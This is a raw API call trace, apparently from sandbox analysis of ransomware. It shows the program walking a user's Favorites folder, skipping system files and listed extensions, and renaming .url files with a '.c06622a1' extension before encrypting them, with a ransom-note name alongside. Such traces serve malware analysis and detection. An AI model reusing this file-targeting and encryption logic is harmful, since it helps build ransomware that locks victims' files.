_wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.233] wcslen (_String="ocx") returned 0x3 [0159.233] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.233] wcslen (_String="prf") returned 0x3 [0159.233] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.233] wcslen (_String="ps1") returned 0x3 [0159.233] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.233] wcslen (_String="rom") returned 0x3 [0159.233] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.233] wcslen (_String="rtp") returned 0x3 [0159.233] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.233] wcslen (_String="scr") returned 0x3 [0159.233] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.233] wcslen (_String="shs") returned 0x3 [0159.233] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.233] wcslen (_String="spl") returned 0x3 [0159.233] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.233] wcslen (_String="sys") returned 0x3 [0159.233] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.233] wcslen (_String="theme") returned 0x5 [0159.233] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.233] wcslen (_String="themepack") returned 0x9 [0159.233] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.233] wcslen (_String="wpx") returned 0x3 [0159.233] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.233] wcslen (_String="lock") returned 0x4 [0159.233] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.233] wcslen (_String="key") returned 0x3 [0159.233] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.233] wcslen (_String="hta") returned 0x3 [0159.233] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.234] wcslen (_String="msi") returned 0x3 [0159.234] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.234] wcslen (_String="pdb") returned 0x3 [0159.234] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.234] wcslen (_String="sqlite") returned 0x6 [0159.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0159.234] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.234] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0159.234] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0159.234] wcscpy (in: _Dest=0x32400d2, _Source="MSN Sports.url" | out: _Dest="MSN Sports.url") returned="MSN Sports.url" [0159.234] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x80) returned 1 [0159.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.234] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.234] CloseHandle (hObject=0x1a8) returned 1 [0159.234] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.235] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" [0159.235] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 0x47 [0159.235] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.235] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.c06622a1"), dwFlags=0x8) returned 1 [0159.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0159.239] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.239] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd949334 [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23cfb750 [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29102dc0 [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71e78e59 [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1cdcc83e [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1df6742a [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c1c86bf [0159.246] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6640fd12 [0159.249] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0xea80b310 [0159.249] RtlComputeCrc32 (PartialCrc=0xb310, Buffer=0x36c0094, Length=0x80) returned 0x4655968e [0159.249] RtlComputeCrc32 (PartialCrc=0x968e, Buffer=0x36c0094, Length=0x80) returned 0xd625fecd [0159.249] RtlComputeCrc32 (PartialCrc=0xfecd, Buffer=0x36c0094, Length=0x80) returned 0x5a790918 [0159.249] RtlComputeCrc32 (PartialCrc=0x918, Buffer=0x36c0094, Length=0x80) returned 0xf64a4ef7 [0159.249] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0159.249] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.249] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.249] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0159.249] _wcsicmp (_Str1="MSN.url", _Str2="README.c06622a1.TXT") returned -5 [0159.249] wcsstr (_Str="MSN.url", _SubStr="README") returned 0x0 [0159.250] _wcsicmp (_Str1="autorun.inf", _Str2="MSN.url") returned -12 [0159.250] wcslen (_String="autorun.inf") returned 0xb [0159.250] _wcsicmp (_Str1="boot.ini", _Str2="MSN.url") returned -11 [0159.250] wcslen (_String="boot.ini") returned 0x8 [0159.250] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN.url") returned -11 [0159.250] wcslen (_String="bootfont.bin") returned 0xc [0159.250] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN.url") returned -11 [0159.250] wcslen (_String="bootsect.bak") returned 0xc [0159.250] _wcsicmp (_Str1="desktop.ini", _Str2="MSN.url") returned -9 [0159.250] wcslen (_String="desktop.ini") returned 0xb [0159.250] _wcsicmp (_Str1="iconcache.db", _Str2="MSN.url") returned -4 [0159.250] wcslen (_String="iconcache.db") returned 0xc [0159.250] _wcsicmp (_Str1="ntldr", _Str2="MSN.url") returned 1 [0159.250] wcslen (_String="ntldr") returned 0x5 [0159.250] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN.url") returned 1 [0159.250] wcslen (_String="ntuser.dat") returned 0xa [0159.250] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN.url") returned 1 [0159.250] wcslen (_String="ntuser.dat.log") returned 0xe [0159.250] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN.url") returned 1 [0159.250] wcslen (_String="ntuser.ini") returned 0xa [0159.250] _wcsicmp (_Str1="thumbs.db", _Str2="MSN.url") returned 7 [0159.250] wcslen (_String="thumbs.db") returned 0x9 [0159.250] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.250] wcslen (_String="386") returned 0x3 [0159.250] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.250] wcslen (_String="adv") returned 0x3 [0159.250] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.250] wcslen (_String="ani") returned 0x3 [0159.250] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.250] wcslen (_String="bat") returned 0x3 [0159.250] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.250] wcslen (_String="bin") returned 0x3 [0159.250] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.250] wcslen (_String="cab") returned 0x3 [0159.250] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.250] wcslen (_String="cmd") returned 0x3 [0159.250] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.251] wcslen (_String="com") returned 0x3 [0159.251] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.251] wcslen (_String="cpl") returned 0x3 [0159.251] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.251] wcslen (_String="cur") returned 0x3 [0159.251] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.251] wcslen (_String="deskthemepack") returned 0xd [0159.251] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.251] wcslen (_String="diagcab") returned 0x7 [0159.251] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.251] wcslen (_String="diagcfg") returned 0x7 [0159.251] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.251] wcslen (_String="diagpkg") returned 0x7 [0159.251] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.251] wcslen (_String="dll") returned 0x3 [0159.251] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.251] wcslen (_String="drv") returned 0x3 [0159.251] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.251] wcslen (_String="exe") returned 0x3 [0159.251] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.251] wcslen (_String="hlp") returned 0x3 [0159.251] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.251] wcslen (_String="icl") returned 0x3 [0159.251] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.251] wcslen (_String="icns") returned 0x4 [0159.251] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.251] wcslen (_String="ico") returned 0x3 [0159.251] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.251] wcslen (_String="ics") returned 0x3 [0159.251] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.251] wcslen (_String="idx") returned 0x3 [0159.251] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.251] wcslen (_String="ldf") returned 0x3 [0159.251] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.251] wcslen (_String="lnk") returned 0x3 [0159.251] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.251] wcslen (_String="mod") returned 0x3 [0159.252] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.252] wcslen (_String="mpa") returned 0x3 [0159.252] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.252] wcslen (_String="msc") returned 0x3 [0159.252] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.252] wcslen (_String="msp") returned 0x3 [0159.252] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.252] wcslen (_String="msstyles") returned 0x8 [0159.252] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.252] wcslen (_String="msu") returned 0x3 [0159.252] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.252] wcslen (_String="nls") returned 0x3 [0159.252] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.252] wcslen (_String="nomedia") returned 0x7 [0159.252] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.252] wcslen (_String="ocx") returned 0x3 [0159.252] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.252] wcslen (_String="prf") returned 0x3 [0159.252] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.252] wcslen (_String="ps1") returned 0x3 [0159.252] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.252] wcslen (_String="rom") returned 0x3 [0159.252] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.252] wcslen (_String="rtp") returned 0x3 [0159.252] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.252] wcslen (_String="scr") returned 0x3 [0159.252] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.252] wcslen (_String="shs") returned 0x3 [0159.252] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.252] wcslen (_String="spl") returned 0x3 [0159.252] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.252] wcslen (_String="sys") returned 0x3 [0159.252] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.252] wcslen (_String="theme") returned 0x5 [0159.252] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.252] wcslen (_String="themepack") returned 0x9 [0159.252] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.253] wcslen (_String="wpx") returned 0x3 [0159.253] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.253] wcslen (_String="lock") returned 0x4 [0159.253] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.253] wcslen (_String="key") returned 0x3 [0159.253] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.253] wcslen (_String="hta") returned 0x3 [0159.253] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.253] wcslen (_String="msi") returned 0x3 [0159.253] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.253] wcslen (_String="pdb") returned 0x3 [0159.253] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.253] wcslen (_String="sqlite") returned 0x6 [0159.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0159.253] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.253] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0159.253] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0159.253] wcscpy (in: _Dest=0x32400d2, _Source="MSN.url" | out: _Dest="MSN.url") returned="MSN.url" [0159.253] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x80) returned 1 [0159.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0159.254] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.254] CloseHandle (hObject=0x1ac) returned 1 [0159.254] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.254] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" [0159.254] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 0x40 [0159.254] wcscpy (in: _Dest=0x32500e8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.254] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.c06622a1"), dwFlags=0x8) returned 1 [0159.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0159.256] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.256] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3750020 [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32ab2458 [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65fe864f [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x549430b2 [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c46bc07 [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3fa753fd [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27b59d8a [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43d4ab9b [0159.263] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x113367bf [0159.266] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3750094, Length=0x80) returned 0x90913c77 [0159.266] RtlComputeCrc32 (PartialCrc=0x3c77, Buffer=0x3750094, Length=0x80) returned 0x683c65ac [0159.266] RtlComputeCrc32 (PartialCrc=0x65ac, Buffer=0x3750094, Length=0x80) returned 0x61f6cc7c [0159.266] RtlComputeCrc32 (PartialCrc=0xcc7c, Buffer=0x3750094, Length=0x80) returned 0x232eaeda [0159.266] RtlComputeCrc32 (PartialCrc=0xaeda, Buffer=0x3750094, Length=0x80) returned 0x82901953 [0159.266] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0159.266] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.266] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.266] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0159.266] _wcsicmp (_Str1="MSNBC News.url", _Str2="README.c06622a1.TXT") returned -5 [0159.266] wcsstr (_Str="MSNBC News.url", _SubStr="README") returned 0x0 [0159.266] _wcsicmp (_Str1="autorun.inf", _Str2="MSNBC News.url") returned -12 [0159.266] wcslen (_String="autorun.inf") returned 0xb [0159.266] _wcsicmp (_Str1="boot.ini", _Str2="MSNBC News.url") returned -11 [0159.266] wcslen (_String="boot.ini") returned 0x8 [0159.266] _wcsicmp (_Str1="bootfont.bin", _Str2="MSNBC News.url") returned -11 [0159.266] wcslen (_String="bootfont.bin") returned 0xc [0159.266] _wcsicmp (_Str1="bootsect.bak", _Str2="MSNBC News.url") returned -11 [0159.266] wcslen (_String="bootsect.bak") returned 0xc [0159.266] _wcsicmp (_Str1="desktop.ini", _Str2="MSNBC News.url") returned -9 [0159.266] wcslen (_String="desktop.ini") returned 0xb [0159.267] _wcsicmp (_Str1="iconcache.db", _Str2="MSNBC News.url") returned -4 [0159.267] wcslen (_String="iconcache.db") returned 0xc [0159.267] _wcsicmp (_Str1="ntldr", _Str2="MSNBC News.url") returned 1 [0159.267] wcslen (_String="ntldr") returned 0x5 [0159.267] _wcsicmp (_Str1="ntuser.dat", _Str2="MSNBC News.url") returned 1 [0159.267] wcslen (_String="ntuser.dat") returned 0xa [0159.267] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSNBC News.url") returned 1 [0159.267] wcslen (_String="ntuser.dat.log") returned 0xe [0159.267] _wcsicmp (_Str1="ntuser.ini", _Str2="MSNBC News.url") returned 1 [0159.267] wcslen (_String="ntuser.ini") returned 0xa [0159.267] _wcsicmp (_Str1="thumbs.db", _Str2="MSNBC News.url") returned 7 [0159.267] wcslen (_String="thumbs.db") returned 0x9 [0159.267] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.267] wcslen (_String="386") returned 0x3 [0159.267] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.267] wcslen (_String="adv") returned 0x3 [0159.267] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.267] wcslen (_String="ani") returned 0x3 [0159.267] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.267] wcslen (_String="bat") returned 0x3 [0159.267] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.267] wcslen (_String="bin") returned 0x3 [0159.267] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.267] wcslen (_String="cab") returned 0x3 [0159.267] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.267] wcslen (_String="cmd") returned 0x3 [0159.267] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.267] wcslen (_String="com") returned 0x3 [0159.267] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.267] wcslen (_String="cpl") returned 0x3 [0159.267] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.267] wcslen (_String="cur") returned 0x3 [0159.267] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.267] wcslen (_String="deskthemepack") returned 0xd [0159.267] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.267] wcslen (_String="diagcab") returned 0x7 [0159.268] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.268] wcslen (_String="diagcfg") returned 0x7 [0159.268] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.268] wcslen (_String="diagpkg") returned 0x7 [0159.268] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.268] wcslen (_String="dll") returned 0x3 [0159.268] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.268] wcslen (_String="drv") returned 0x3 [0159.268] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.268] wcslen (_String="exe") returned 0x3 [0159.268] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.268] wcslen (_String="hlp") returned 0x3 [0159.268] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.268] wcslen (_String="icl") returned 0x3 [0159.268] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.268] wcslen (_String="icns") returned 0x4 [0159.268] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.268] wcslen (_String="ico") returned 0x3 [0159.268] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.268] wcslen (_String="ics") returned 0x3 [0159.268] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.268] wcslen (_String="idx") returned 0x3 [0159.268] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.268] wcslen (_String="ldf") returned 0x3 [0159.268] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.268] wcslen (_String="lnk") returned 0x3 [0159.268] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.268] wcslen (_String="mod") returned 0x3 [0159.268] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.268] wcslen (_String="mpa") returned 0x3 [0159.268] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.268] wcslen (_String="msc") returned 0x3 [0159.268] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.268] wcslen (_String="msp") returned 0x3 [0159.269] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.269] wcslen (_String="msstyles") returned 0x8 [0159.269] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.269] wcslen (_String="msu") returned 0x3 [0159.269] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.269] wcslen (_String="nls") returned 0x3 [0159.269] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.269] wcslen (_String="nomedia") returned 0x7 [0159.269] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.269] wcslen (_String="ocx") returned 0x3 [0159.269] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.269] wcslen (_String="prf") returned 0x3 [0159.269] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.269] wcslen (_String="ps1") returned 0x3 [0159.269] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.269] wcslen (_String="rom") returned 0x3 [0159.269] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.269] wcslen (_String="rtp") returned 0x3 [0159.269] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.269] wcslen (_String="scr") returned 0x3 [0159.269] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.269] wcslen (_String="shs") returned 0x3 [0159.269] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.269] wcslen (_String="spl") returned 0x3 [0159.270] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.270] wcslen (_String="sys") returned 0x3 [0159.270] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.270] wcslen (_String="theme") returned 0x5 [0159.270] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.270] wcslen (_String="themepack") returned 0x9 [0159.270] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.270] wcslen (_String="wpx") returned 0x3 [0159.270] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.270] wcslen (_String="lock") returned 0x4 [0159.270] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.270] wcslen (_String="key") returned 0x3 